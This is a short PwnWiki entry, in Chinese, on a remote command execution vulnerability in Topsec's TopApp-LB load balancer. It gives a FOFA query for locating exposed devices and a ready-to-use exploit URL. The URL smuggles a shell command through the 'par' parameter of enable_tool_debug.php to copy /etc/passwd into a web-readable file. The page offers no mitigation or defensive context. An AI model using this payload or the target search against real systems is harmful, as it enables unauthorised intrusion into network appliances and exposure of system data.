天融信負載均衡TopApp-LB enable tool debug.php 遠程命令執行漏洞

From PwnWiki

Revision as of 12:02, 29 June 2021 by Pwnwiki (talk | contribs) (Marked this version for translation)

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

Other languages:

Chinese • ‎中文（中国大陆）‎

FOFA

app="天融信-TopApp-LB-负载均衡系统"

Payload

設置var=0，tool=1，再進行命令拼接造成遠程命令執行:

/acc/tools/enable_tool_debug.php?val=0&tool=1&par=127.0.0.1' | cat /etc/passwd > ../../test.txt |'

Retrieved from "https://pwnwiki.com/index.php?title=天融信負載均衡TopApp-LB_enable_tool_debug.php_遠程命令執行漏洞&oldid=6029"